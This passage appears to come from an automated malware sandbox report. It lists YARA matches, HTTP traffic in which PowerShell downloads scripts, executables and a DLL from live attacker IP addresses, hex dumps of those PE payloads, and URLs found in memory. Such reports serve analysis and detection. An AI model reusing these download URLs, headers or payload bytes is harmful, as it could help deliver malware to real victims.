            Source: Yara matchFile source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPE
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 02 Jan 2025 18:14:09 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 02 Jan 2025 11:05:36 GMTETag: "325e0-62ab7244bf291"Accept-Ranges: bytesContent-Length: 206304Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ae 14 73 f9 ea 75 1d aa ea 75 1d aa ea 75 1d aa fe 1e 1e ab e2 75 1d aa fe 1e 1c ab fd 75 1d aa ea 75 1c aa ae 77 1d aa fe 1e 18 ab c4 75 1d aa fe 1e 19 ab a5 75 1d aa fe 1e e2 aa eb 75 1d aa fe 1e 1f ab eb 75 1d aa 52 69 63 68 ea 75 1d aa 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e2 9e e4 2e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 14 00 16 02 00 00 f2 00 00 00 00 00 00 a0 f0 01 00 00 10 00 00 00 30 02 00 00 00 40 00 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00 00 05 00 01 00 00 00 00 00 00 30 03 00 00 04 00 00 26 47 03 00 02 00 40 c1 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 48 02 00 f0 00 00 00 00 60 02 00 90 96 00 00 00 00 00 00 00 00 00 00 00 04 03 00 e0 21 00 00 00 00 03 00 18 2a 00 00 f0 9e 00 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f4 9f 00 00 18 00 00 00 48 9f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 02 00 6c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 14 02 00 00 10 00 00 00 16 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 74 0e 00 00 00 30 02 00 00 08 00 00 00 1a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 2c 1d 00 00 00 40 02 00 00 1e 00 00 00 22 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 90 96 00 00 00 60 02 00 00 98 00 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 18 2a 00 00 00 00 03 00 00 2c 00 00 00 d8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 02 Jan 2025 18:14:10 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 02 Jan 2025 11:05:39 GMTETag: "16000-62ab724726645"Accept-Ranges: bytesContent-Length: 90112Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7f 78 25 53 3b 19 4b 00 3b 19 4b 00 3b 19 4b 00 70 61 48 01 31 19 4b 00 70 61 4e 01 a8 19 4b 00 70 61 4f 01 2f 19 4b 00 3d 98 4e 01 24 19 4b 00 3d 98 4f 01 2a 19 4b 00 3d 98 48 01 2f 19 4b 00 70 61 4a 01 38 19 4b 00 3b 19 4a 00 6e 19 4b 00 56 98 42 01 3a 19 4b 00 56 98 4b 01 3a 19 4b 00 56 98 b4 00 3a 19 4b 00 56 98 49 01 3a 19 4b 00 52 69 63 68 3b 19 4b 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 95 72 76 67 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 26 00 de 00 00 00 88 00 00 00 00 00 00 63 13 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 01 00 00 04 00 00 00 00 00 00 03 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 d0 4a 01 00 54 00 00 00 24 4b 01 00 28 00 00 00 00 80 01 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 2c 0f 00 00 b8 3e 01 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 3d 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 20 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1e dd 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b2 61 00 00 00 f0 00 00 00 62 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 13 00 00 00 60 01 00 00 0a 00 00 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 80 01 00 00 02 00 00 00 4e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 2c 0f 00 00 00 90 01 00 00 10 00 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 02 Jan 2025 18:14:13 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 02 Jan 2025 10:33:38 GMTETag: "8a00-62ab6b1fe4fe2"Accept-Ranges: bytesContent-Length: 35328Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a1 69 0e 88 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 80 00 00 00 08 00 00 00 00 00 00 7a 9f 00 00 00 20 00 00 00 a0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 00 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 9f 00 00 4f 00 00 00 00 a0 00 00 d0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 0c 00 00 00 0c 9f 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 80 7f 00 00 00 20 00 00 00 80 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 05 00 00 00 a0 00 00 00 06 00 00 00 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 00 00 00 02 00 00 00 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5c 9f 00 00 00 00 00 00 48 00 00 00 02 00 05 00 ac 21 00 00 60 7d 00 00 03 00 02 00 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 05 00 3a 00 00 00 01 00 00 11 28 0f 00 00 0a 03 6f 10 00 00 0a 0a 02 8e 69 8d 15 00 00 01 0b 16 0c 16 0d 2b 17 07 09 02 09 91 06 08 91 61 d2 9c 08 17 58 06 8e 69 5d 0c 09 17 58 0d 09 02 8e 69 32 e3 07 2a 00 00 13 30 02 00 19 00 00 00 02 00 00 11 02 28 11 00 00 0a 03 28 01 00 00 06 0a 28 0f 00 00 0a 06 6f 12 00 00 0a 2a 1e 02 28 13 00 00 0a 2a 00 00 00 13 30 07 00 9e 00 00 00 03 00 00 11 72 01 00 00 70 0a 73 14 00 00 0a 73 15 00 00 0a 0b 07 6f 16 00 00 0a 72 3e 73 00 70 7e 01 00 00 04 28 02 00 00 06 6f 17 00 00 0a 26 07 6f 16 00 00 0a 72 60 73 00 70 7e 01 00 00 04 28 02 00 00 06 6f 17 00 00 0a 26 07 17 6f 18 00 00 0a 07 17 8d 19 00 00 01 25 16 06 7e 01 00 00 04 28 02 00 00 06 a2 6f 19 00 00 0a 6f 1a 00 00 0a 72 8a 73 00 70 7e 01 00 00 04 28 02 00 00 06 6f 1b 00 00 0a 72 ac 73 00 70 7e 01 00 00 04 28 02 00 00 06 6f 1c 00 00 0a 14 14 6f 1d 00 00 0a 26 2a 1e 02 28 13 00 00 0a 2a 1a 28 04 00 00 06 2a 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a 6a
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 02 Jan 2025 18:14:14 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 02 Jan 2025 09:39:17 GMTETag: "2fdc00-62ab5ef921a41"Accept-Ranges: bytesContent-Length: 3136512Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6e 66 5c 67 00 00 00 00 00 00 00 00 e0 00 02 00 0b 01 08 00 00 ca 2f 00 00 10 00 00 00 00 00 00 ee e8 2f 00 00 20 00 00 00 00 30 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 30 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 e8 2f 00 53 00 00 00 00 00 30 00 f7 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 30 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 c8 2f 00 00 20 00 00 00 ca 2f 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f7 0d 00 00 00 00 30 00 00 0e 00 00 00 cc 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 30 00 00 02 00 00 00 da 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 e8 2f 00 00 00 00 00 48 00 00 00 02 00 05 00 18 00 14 00 80 e8 1b 00 01 00 00 00 c5 08 00 06 18 47 12 00 fe b8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c c3 df 8f 3c 11 bd ff 34 87 b1 23 14 56 06 77 83 64 21 f6 ae ea 92 48 41 5a d4 f4 e9 cb 91 b0 af f6 49 f6 31 fe 0b 17 da cb 0b c6 59 cd b0 54 38 44 e3 bf 63 5b db 81 ef 32 94 82 dc bc a4 15 ec 6e 6a 6c 4f ca 73 5d 79 78 af 3c 8f 6d 74 38 2a ad 8e 04 fd f1 d9 42 ea a1 c0 ca 2d 1d 1e 72 49 18 a3 ca 67 a3 fa 83 3a fe 6d c8 00 65 80 c0 b1 cd 1f 89 87 cf a0 e4 6a 7b 55 6d 37 ff 10 39 99 3b 0d 11 ce 24 89 51 57 a9 9a d9 1e d7 41 41 30 56 30 79 d5 68 60 34 62 45 eb b4 89 3d f7 f7 b8 57 00 07 80 c2 18 00 be 4d 9a 26 2c 91 ed 43 ae 09 85 03 3a f6 5d 29 17 23 eb cb 6c ab 41 47 38 e9 42 0d ca 33 4f 29 3b 81 c3 22 e3 f2 4c ad 22 f7 8c 70 ee f5 a1 3c 31 7f 39 3b e3 59 46 98 20 f2 38 66 ea 4b 3f 12 e4 df 04 93 83 92 d6 9e 57 45 77 e8 3a c3 37 69 28 7d 08 d2 97 f4 6a 59 b3 32 a6 5d 75 7b e8 14 ac f8 91 31 43 fd e8 ad 72 7f fc a1 db 68 a8 fe 3a bf 62 e4 a1 05 9f af 76 4a fb 0a d0 aa c3 01 8b a1 6e db ab 11 f6 ba 16 d5 04 d7 8d fd 11 ad d7 35 ab 29 f6 63 b8 1d b1
            Source: global trafficHTTP traffic detected: GET /infopage/rwvg1.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
            Source: global trafficHTTP traffic detected: GET /infopage/ersyb.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
            Source: Joe Sandbox ViewIP Address: 147.45.44.131 147.45.44.131
            Source: Joe Sandbox ViewASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
            Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49714 -> 185.149.146.164:80
            Source: global trafficHTTP traffic detected: GET /wrcaf.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 185.149.146.164Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /infopage/file.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.44.131Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /infopage/iviewers.dll HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.44.131
            Source: global trafficHTTP traffic detected: GET /infopage/iubn.ps1 HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.44.131Connection: Keep-Alive
            Source: unknownTCP traffic detected without corresponding DNS query: 185.149.146.164
            Source: unknownTCP traffic detected without corresponding DNS query: 185.149.146.164
            Source: unknownTCP traffic detected without corresponding DNS query: 185.149.146.164
            Source: unknownTCP traffic detected without corresponding DNS query: 185.149.146.164
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: global trafficHTTP traffic detected: GET /wrcaf.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 185.149.146.164Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /infopage/file.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.44.131Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /infopage/iviewers.dll HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.44.131
            Source: global trafficHTTP traffic detected: GET /infopage/iubn.ps1 HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.44.131Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /infopage/rwvg1.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
            Source: global trafficHTTP traffic detected: GET /infopage/ersyb.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
            Source: powershell.exe, 00000003.00000002.2177596881.00000169B17AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2177596881.00000169B1497000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2248203691.000000000506F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2248203691.0000000004E06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131
            Source: powershell.exe, 00000008.00000002.2248203691.0000000004FD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2288952062.0000000008670000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000009.00000003.2208675662.00000000052C6000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000009.00000003.2208452005.00000000052D5000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000009.00000003.2208523176.00000000052C4000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000009.00000003.2209557435.00000000052C6000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000009.00000002.2210070157.00000000052C6000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000009.00000003.2208576514.00000000052D5000.00000004.00000020.00020000.00000000.sdmp, iacipmps.dll.9.dr, iacipmps.0.cs.8.drString found in binary or memory: http://147.45.44.131/infopage/ersyb.exe
            Source: csc.exe, 00000009.00000003.2209327326.0000000005571000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/ersyb.exe0W
            Source: powershell.exe, 00000003.00000002.2177596881.00000169B11B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/file.exe
            Source: powershell.exe, 00000008.00000002.2247878254.00000000047E0000.00000004.00000020.00020000.00000000.sdmp, iviewers.dll.3.drString found in binary or memory: http://147.45.44.131/infopage/iubn.ps1
            Source: powershell.exe, 00000003.00000002.2177596881.00000169B11B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/iviewers.dll
            Source: powershell.exe, 00000008.00000002.2248203691.0000000004EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/rwvg1.exe
            Source: powershell.exe, 00000008.00000002.2248203691.000000000506F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.448JU
            Source: powershell.exe, 00000008.00000002.2248203691.0000000004FD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.448V
            Source: powershell.exe, 00000003.00000002.2177596881.00000169B07F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.149.146.164
            Source: powershell.exe, 00000003.00000002.2177596881.00000169AFBC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2177596881.00000169AFDF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2177596881.00000169B07F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.149.146.164/wrcaf.ps1
            Source: powershell.exe, 00000008.00000002.2283880375.00000000072F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
            Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ipinfo.io/ip
            Source: powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
            Source: powershell.exe, 00000003.00000002.2209534008.00000169BFC31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2209534008.00000169BFD73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005D19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000008.00000002.2248203691.0000000004E06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000000.00000002.2225680546.0000025C4299C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2177596881.00000169AFBC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2248203691.0000000004CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Amcache.hve.19.drString found in binary or memory: http://upx.sf.net
            Source: powershell.exe, 00000008.00000002.2248203691.0000000004E06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.newtonsoft.com/jsonschema
